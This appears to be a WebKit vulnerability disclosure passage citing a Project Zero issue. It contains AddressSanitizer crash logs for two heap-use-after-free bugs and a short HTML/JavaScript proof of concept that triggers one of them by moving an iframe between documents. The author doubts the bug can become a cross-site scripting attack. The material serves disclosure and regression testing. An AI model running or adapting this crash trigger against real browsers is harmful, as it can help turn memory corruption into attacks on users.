#5 0x1070919e1 in JSC::DFG::compileImpl(JSC::VM&, JSC::CodeBlock*, JSC::CodeBlock*, JSC::DFG::CompilationMode, unsigned int, JSC::Operands<JSC::JSValue> const&, WTF::PassRefPtr<JSC::DeferredCompilationCallback>) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x8de9e1)
#6 0x1070913c8 in JSC::DFG::compile(JSC::VM&, JSC::CodeBlock*, JSC::CodeBlock*, JSC::DFG::CompilationMode, unsigned int, JSC::Operands<JSC::JSValue> const&, WTF::PassRefPtr<JSC::DeferredCompilationCallback>) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x8de3c8)
#7 0x1071e8a07 in JSC::DFG::tierUpCommon(JSC::ExecState*, unsigned int, unsigned int) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xa35a07)
#8 0x1071e9589 in triggerOSREntryNow (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xa36589)
#9 0x449e46e022e0 (<unknown module>)
#10 0x107a904fc in llint_entry (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12dd4fc)
#11 0x107a89aca in vmEntryToJavaScript (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12d6aca)
#12 0x10773d60d in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf8a60d)
#13 0x1076c60dd in JSC::Interpreter::execute(JSC::ProgramExecutable*, JSC::ExecState*, JSC::JSObject*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf130dd)
#14 0x106ea73a6 in JSC::evaluate(JSC::ExecState*, JSC::SourceCode const&, JSC::JSValue, WTF::NakedPtr<JSC::Exception>&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x6f43a6)
#15 0x106ea75ae in JSC::profiledEvaluate(JSC::ExecState*, JSC::ProfilingReason, JSC::SourceCode const&, JSC::JSValue, WTF::NakedPtr<JSC::Exception>&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x6f45ae)
#16 0x10c86d8c3 in WebCore::JSMainThreadExecState::profiledEvaluate(JSC::ExecState*, JSC::ProfilingReason, JSC::SourceCode const&, JSC::JSValue, WTF::NakedPtr<JSC::Exception>&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x25348c3)
#17 0x10c86d434 in WebCore::ScriptController::evaluateInWorld(WebCore::ScriptSourceCode const&, WebCore::DOMWrapperWorld&, WebCore::ExceptionDetails*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2534434)
#18 0x10c881081 in WebCore::ScriptElement::executeClassicScript(WebCore::ScriptSourceCode const&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2548081)
#19 0x10c87e0c2 in WebCore::ScriptElement::prepareScript(WTF::TextPosition const&, WebCore::ScriptElement::LegacyTypeSupport) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x25450c2)
#20 0x10b01bb60 in WebCore::HTMLScriptRunner::runScript(WebCore::ScriptElement&, WTF::TextPosition const&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xce2b60)
#21 0x10b01b8a5 in WebCore::HTMLScriptRunner::execute(WTF::Ref<WebCore::ScriptElement>&&, WTF::TextPosition const&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xce28a5)
#22 0x10af4576e in WebCore::HTMLDocumentParser::runScriptsForPausedTreeBuilder() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc0c76e)
#23 0x10af45e52 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc0ce52)
SUMMARY: AddressSanitizer: heap-use-after-free (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x4c7f15) in JSC::B3::Procedure::resetReachability()
Shadow bytes around the buggy address:
0x1c0e00013290: 00 00 00 00 fa fa fa fa 00 00 00 00 00 00 00 00
0x1c0e000132a0: 00 00 fa fa fa fa 00 00 00 00 00 00 00 00 fc 00
0x1c0e000132b0: fa fa fa fa 00 00 00 00 00 00 00 00 fc 00 fa fa
0x1c0e000132c0: fa fa 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
0x1c0e000132d0: 00 00 00 00 00 00 00 00 fc 00 fa fa fa fa fd fd
=>0x1c0e000132e0: fd fd fd fd fd fd fd[fd]fa fa fa fa 00 00 00 00
0x1c0e000132f0: 00 00 00 fc fc fa fa fa fa fa 00 00 00 00 00 00
0x1c0e00013300: 00 fc fc fa fa fa fa fa 00 00 00 00 00 00 00 fc
0x1c0e00013310: fc fa fa fa fa fa 00 00 00 00 00 00 00 fc fc fa
0x1c0e00013320: fa fa fa fa 00 00 00 00 00 00 00 fc fc fa fa fa
0x1c0e00013330: fa fa 00 00 00 00 00 00 00 fc fc fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==32191==ABORTING
-->
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1099
This is a regression test from: https://crbug.com/541206.
But I think it seems not possible to turn it into an UXSS in WebKit.
PoC:
-->
<body>
<script>
var s = document.body.appendChild(document.createElement('script'));
s.type = '0';
s.textContent = 'document.body.appendChild(parent.i0)';
var i0 = s.appendChild(document.createElement('iframe'));
s.type = '';
var f = document.body.appendChild(document.createElement('iframe'));
f.contentDocument.adoptNode(i0);
f.src = 'about:blank';
</script>
</body>
<!--
Asan Log:
==54938==ERROR: AddressSanitizer: heap-use-after-free on address 0x61a0000c5a80 at pc 0x0001151d388b bp 0x7fff584254c0 sp 0x7fff584254b8
READ of size 8 at 0x61a0000c5a80 thread T0
#0 0x1151d388a in WTF::TypeCastTraits<WebCore::FrameView const, WebCore::ScrollView const, false>::isType(WebCore::Widget const&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7788a)
#1 0x115c355e8 in WebCore::FrameView::convertToContainingView(WebCore::IntPoint const&) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xad95e8)
#2 0x1176e8df7 in WebCore::ScrollView::contentsToContainingViewContents(WebCore::IntPoint const&) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x258cdf7)
#3 0x1176af5d4 in WebCore::ScrollingCoordinator::absoluteEventTrackingRegionsForFrame(WebCore::Frame const&) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x25535d4)
#4 0x1176afb10 in WebCore::ScrollingCoordinator::absoluteEventTrackingRegions() const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2553b10)
#5 0x115298ff9 in WebCore::AsyncScrollingCoordinator::frameViewLayoutUpdated(WebCore::FrameView&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x13cff9)
#6 0x115c140f9 in WebCore::FrameView::performPostLayoutTasks() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xab80f9)
#7 0x115c1c24a in WebCore::FrameView::layout(bool) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xac024a)
#8 0x11586e89e in WebCore::Document::implicitClose() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x71289e)
#9 0x115bdf621 in WebCore::FrameLoader::checkCompleted() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa83621)
#10 0x115bdcafa in WebCore::FrameLoader::finishedParsing() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa80afa)
#11 0x11588c12d in WebCore::Document::finishedParsing() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x73012d)
#12 0x115d8f14d in WebCore::HTMLDocumentParser::prepareToStopParsing() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc3314d)
#13 0x11592316c in WebCore::DocumentWriter::end() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7c716c)
#14 0x1158e622f in WebCore::DocumentLoader::finishedLoading(double) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x78a22f)
#15 0x1158ee2e5 in WebCore::DocumentLoader::maybeLoadEmpty() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7922e5)
#16 0x1158ee6d3 in WebCore::DocumentLoader::startLoadingMainResource() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7926d3)
#17 0x115beec01 in WebCore::FrameLoader::continueLoadAfterWillSubmitForm() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa92c01)
#18 0x115be8495 in WebCore::FrameLoader::continueLoadAfterNavigationPolicy(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8c495)
#19 0x115bfc4ba in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4::operator()(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa04ba)
#20 0x115bfc301 in void std::__1::__invoke_void_return_wrapper<void>::__call<WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool>(WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4&&&, WebCore::ResourceRequest const&&&, WTF::PassRefPtr<WebCore::FormState>&&, bool&&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa0301)
#21 0x1170fd592 in std::__1::function<void (WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool)>::operator()(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa1592)
#22 0x1170fd300 in WebCore::PolicyCallback::call(bool) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa1300)
#23 0x1170ff0aa in WebCore::PolicyChecker::continueAfterNavigationPolicy(WebCore::PolicyAction) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa30aa)
#24 0x107df7b2e in std::__1::function<void (WebCore::PolicyAction)>::operator()(WebCore::PolicyAction) const (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x60fb2e)
#25 0x107df7986 in WebKit::WebFrame::didReceivePolicyDecision(unsigned long long, WebCore::PolicyAction, unsigned long long, WebKit::DownloadID) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x60f986)
#26 0x107e07dbc in WebKit::WebFrameLoaderClient::dispatchDecidePolicyForNavigationAction(WebCore::NavigationAction const&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, std::__1::function<void (WebCore::PolicyAction)>) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x61fdbc)
#27 0x1170fea08 in WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest const&, bool, WebCore::DocumentLoader*, WTF::PassRefPtr<WebCore::FormState>, std::__1::function<void (WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool)>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa2a08)
#28 0x115be72b3 in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8b2b3)
#29 0x115be5de6 in WebCore::FrameLoader::loadWithNavigationAction(WebCore::ResourceRequest const&, WebCore::NavigationAction const&, WebCore::LockHistory, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa89de6)
#30 0x115be2113 in WebCore::FrameLoader::loadURL(WebCore::FrameLoadRequest const&, WTF::String const&, WebCore::FrameLoadType, WebCore::Event*, WTF::PassRefPtr<WebCore::FormState>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa86113)
#31 0x115bdb1c4 in WebCore::FrameLoader::loadFrameRequest(WebCore::FrameLoadRequest const&, WebCore::Event*, WTF::PassRefPtr<WebCore::FormState>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa7f1c4)
#32 0x115bda68e in WebCore::FrameLoader::urlSelected(WebCore::FrameLoadRequest const&, WebCore::Event*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa7e68e)
#33 0x116fdaa98 in WebCore::ScheduledLocationChange::fire(WebCore::Frame&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1e7ea98)
#34 0x116fd732f in WebCore::NavigationScheduler::timerFired() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1e7b32f)
#35 0x117b92cd1 in WebCore::ThreadTimers::sharedTimerFiredInternal() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2a36cd1)
#36 0x116df2baf in WebCore::timerFired(__CFRunLoopTimer*, void*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1c96baf)
#37 0x7fff93728243 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x91243)
#38 0x7fff93727ece in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x90ece)
#39 0x7fff93727a29 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x90a29)
#40 0x7fff9371f3e0 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x883e0)
#41 0x7fff9371e973 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x87973)
#42 0x7fff92caaacb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30acb)
#43 0x7fff92caa900 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30900)
#44 0x7fff92caa735 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30735)
#45 0x7fff91250ae3 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x46ae3)
#46 0x7fff919cb21e in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x7c121e)
#47 0x7fff91245464 in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x3b464)
#48 0x7fff9120fd7f in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x5d7f)
#49 0x7fffa8edb8c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib+0x108c6)
#50 0x7fffa8eda2e3 in xpc_main (/usr/lib/system/libxpc.dylib+0xf2e3)
#51 0x1077d1b73 in main (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development+0x100001b73)
#52 0x7fffa8c77254 in start (/usr/lib/system/libdyld.dylib+0x5254)
0x61a0000c5a80 is located 0 bytes inside of 1232-byte region [0x61a0000c5a80,0x61a0000c5f50)
freed by thread T0 here:
#0 0x10a087db9 in wrap_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4adb9)
#1 0x10d0da25b in bmalloc::Deallocator::deallocateSlowCase(void*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18c725b)
#2 0x11759427e in WTF::RefPtr<WebCore::Widget>::operator=(std::nullptr_t) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x243827e)
#3 0x117592d19 in WebCore::RenderWidget::setWidget(WTF::RefPtr<WebCore::Widget>&&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2436d19)
#4 0x115bd46be in WebCore::Frame::createView(WebCore::IntSize const&, WebCore::Color const&, bool, WebCore::IntSize const&, WebCore::IntRect const&, bool, WebCore::ScrollbarMode, bool, WebCore::ScrollbarMode, bool) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa786be)
#5 0x107e0df0b in WebKit::WebFrameLoaderClient::transitionToCommittedForNewPage() (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x625f0b)
#6 0x115beb6cf in WebCore::FrameLoader::transitionToCommitted(WebCore::CachedPage*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8f6cf)
#7 0x115bea77b in WebCore::FrameLoader::commitProvisionalLoad() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8e77b)
#8 0x1158e6197 in WebCore::DocumentLoader::finishedLoading(double) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x78a197)
#9 0x1158ee2e5 in WebCore::DocumentLoader::maybeLoadEmpty() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7922e5)
#10 0x1158ee6d3 in WebCore::DocumentLoader::startLoadingMainResource() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7926d3)
#11 0x115beec01 in WebCore::FrameLoader::continueLoadAfterWillSubmitForm() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa92c01)
#12 0x115be8495 in WebCore::FrameLoader::continueLoadAfterNavigationPolicy(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8c495)
#13 0x115bfc4ba in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4::operator()(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa04ba)
#14 0x115bfc301 in void std::__1::__invoke_void_return_wrapper<void>::__call<WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool>(WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4&&&, WebCore::ResourceRequest const&&&, WTF::PassRefPtr<WebCore::FormState>&&, bool&&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa0301)
#15 0x1170fd592 in std::__1::function<void (WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool)>::operator()(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa1592)
#16 0x1170fd300 in WebCore::PolicyCallback::call(bool) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa1300)
#17 0x1170ff0aa in WebCore::PolicyChecker::continueAfterNavigationPolicy(WebCore::PolicyAction) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa30aa)
#18 0x107df7b2e in std::__1::function<void (WebCore::PolicyAction)>::operator()(WebCore::PolicyAction) const (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x60fb2e)
#19 0x107df7986 in WebKit::WebFrame::didReceivePolicyDecision(unsigned long long, WebCore::PolicyAction, unsigned long long, WebKit::DownloadID) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x60f986)
#20 0x107e07dbc in WebKit::WebFrameLoaderClient::dispatchDecidePolicyForNavigationAction(WebCore::NavigationAction const&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, std::__1::function<void (WebCore::PolicyAction)>) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x61fdbc)
#21 0x1170fea08 in WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest const&, bool, WebCore::DocumentLoader*, WTF::PassRefPtr<WebCore::FormState>, std::__1::function<void (WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool)>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa2a08)
#22 0x115be72b3 in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8b2b3)
#23 0x115be5de6 in WebCore::FrameLoader::loadWithNavigationAction(WebCore::ResourceRequest const&, WebCore::NavigationAction const&, WebCore::LockHistory, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa89de6)
#24 0x115be2113 in WebCore::FrameLoader::loadURL(WebCore::FrameLoadRequest const&, WTF::String const&, WebCore::FrameLoadType, WebCore::Event*, WTF::PassRefPtr<WebCore::FormState>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa86113)
#25 0x115bdb1c4 in WebCore::FrameLoader::loadFrameRequest(WebCore::FrameLoadRequest const&, WebCore::Event*, WTF::PassRefPtr<WebCore::FormState>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa7f1c4)
#26 0x115bda68e in WebCore::FrameLoader::urlSelected(WebCore::FrameLoadRequest const&, WebCore::Event*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa7e68e)
#27 0x116fdaa98 in WebCore::ScheduledLocationChange::fire(WebCore::Frame&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1e7ea98)
#28 0x116fd732f in WebCore::NavigationScheduler::timerFired() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1e7b32f)
#29 0x117b92cd1 in WebCore::ThreadTimers::sharedTimerFiredInternal() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2a36cd1)
previously allocated by thread T0 here:
#0 0x10a087bf0 in wrap_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4abf0)
#1 0x10d0d901e in bmalloc::Allocator::allocateSlowCase(unsigned long) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18c601e)
#2 0x10d074535 in bmalloc::Allocator::allocate(unsigned long) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1861535)
#3 0x115c14a59 in WebCore::FrameView::create(WebCore::Frame&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xab8a59)
#4 0x115bd459c in WebCore::Frame::createView(WebCore::IntSize const&, WebCore::Color const&, bool, WebCore::IntSize const&, WebCore::IntRect const&, bool, WebCore::ScrollbarMode, bool, WebCore::ScrollbarMode, bool) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa7859c)
#5 0x107e0df0b in WebKit::WebFrameLoaderClient::transitionToCommittedForNewPage() (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x625f0b)
#6 0x115beb6cf in WebCore::FrameLoader::transitionToCommitted(WebCore::CachedPage*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8f6cf)
#7 0x115bea77b in WebCore::FrameLoader::commitProvisionalLoad() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8e77b)
#8 0x1158e6197 in WebCore::DocumentLoader::finishedLoading(double) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x78a197)
#9 0x1158ee2e5 in WebCore::DocumentLoader::maybeLoadEmpty() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7922e5)
#10 0x1158ee6d3 in WebCore::DocumentLoader::startLoadingMainResource() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7926d3)
#11 0x115beec01 in WebCore::FrameLoader::continueLoadAfterWillSubmitForm() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa92c01)
#12 0x115be8495 in WebCore::FrameLoader::continueLoadAfterNavigationPolicy(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8c495)
#13 0x115bfc4ba in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4::operator()(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa04ba)
#14 0x115bfc301 in void std::__1::__invoke_void_return_wrapper<void>::__call<WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool>(WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4&&&, WebCore::ResourceRequest const&&&, WTF::PassRefPtr<WebCore::FormState>&&, bool&&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa0301)
#15 0x1170fd592 in std::__1::function<void (WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool)>::operator()(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa1592)
#16 0x1170fd300 in WebCore::PolicyCallback::call(bool) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa1300)
#17 0x1170ff0aa in WebCore::PolicyChecker::continueAfterNavigationPolicy(WebCore::PolicyAction) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa30aa)
#18 0x107df7b2e in std::__1::function<void (WebCore::PolicyAction)>::operator()(WebCore::PolicyAction) const (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x60fb2e)
#19 0x107df7986 in WebKit::WebFrame::didReceivePolicyDecision(unsigned long long, WebCore::PolicyAction, unsigned long long, WebKit::DownloadID) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x60f986)
#20 0x107e07dbc in WebKit::WebFrameLoaderClient::dispatchDecidePolicyForNavigationAction(WebCore::NavigationAction const&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, std::__1::function<void (WebCore::PolicyAction)>) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x61fdbc)
#21 0x1170fea08 in WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest const&, bool, WebCore::DocumentLoader*, WTF::PassRefPtr<WebCore::FormState>, std::__1::function<void (WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool)>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa2a08)
